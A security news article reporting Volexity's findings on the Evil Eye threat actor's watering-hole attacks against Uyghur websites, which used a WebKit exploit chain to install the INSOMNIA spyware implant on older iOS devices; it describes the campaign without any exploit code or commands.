A Chinese threat actor tracked as Evil Eye has updated the tools it uses to target Uyghurs, a minority Turkic ethnic group in the Xinjiang Uyghur Autonomous Region in Northwest China, incident response and threat intelligence firm Volexity reports.
Evil Eye, which was previously associated with activity linked to the adversary referred to as POISON CARP, was in the past observed leveraging exploits aimed at Android and iOS devices, but went silent after its operations were publicly detailed last year.
Starting January 2020, however, the threat actor resumed operations, with signs of activity identified “across multiple previously compromised Uyghur websites.”
As part of the new attacks, Evil Eye launched an exploit chain using the open source framework IRONSQUIRREL, targeting iOS devices to abuse a WebKit vulnerability that was patched in the summer of 2019. The exploit, Volexity says, works against iOS versions 12.3, 12.3.1, and 12.3.2.
Successful exploitation of vulnerable systems results in a new version of the threat actor’s implant being delivered, which Volexity refers to as INSOMNIA.
The security firm says it observed multiple different attacks installing the implant on iOS devices. These attacks involved six exploit websites between January and March 2020, five implant instances, three command and control (C&C) IP and port pair combinations, and two unique C&C IP addresses.
Malicious iframes on the compromised websites would load IRONSQUIRREL code, with the most recent attacks associated with the Uyghur Academy website only. The code on this site appears to be exclusively used by the threat actor to target visitors if a User-Agent string associated with a vulnerable iPhone or iPad is detected.
“Note that exploit can be triggered through any browser on the phone, as they all use WebKit. Volexity was able to confirm successful exploitation of a phone running 12.3.1 via the Apple Safari, Google Chrome, and Microsoft Edge mobile browsers,” Volexity explains.
The INSOMNIA implant runs as root with various entitlements, providing the threat actor with access to all the data considered to be of interest.
The updated implant features new hardcoded IP addresses, uses HTTPs for C&C communication, targets Signal and ProtonMail, uses an embedded certificate for C&C validation, and employs basic obfuscation. At installation, the malware sends information about all installed apps on the phone.
The implant, however, does not have a mechanism for persistence, which suggests that the attackers need to work quickly to harvest and exfiltrate the data they are looking for to avoid losing access in the event of a reboot. Yet, the researchers also suggest the threat actor might have a method for manually gaining persistence on verified targets.
“It can now be confirmed that in the past six months, Uyghur sites have led to malware for all major platforms, representing a considerable development and upkeep effort by the attackers to spy on the Uyghur population,” Volexity concludes.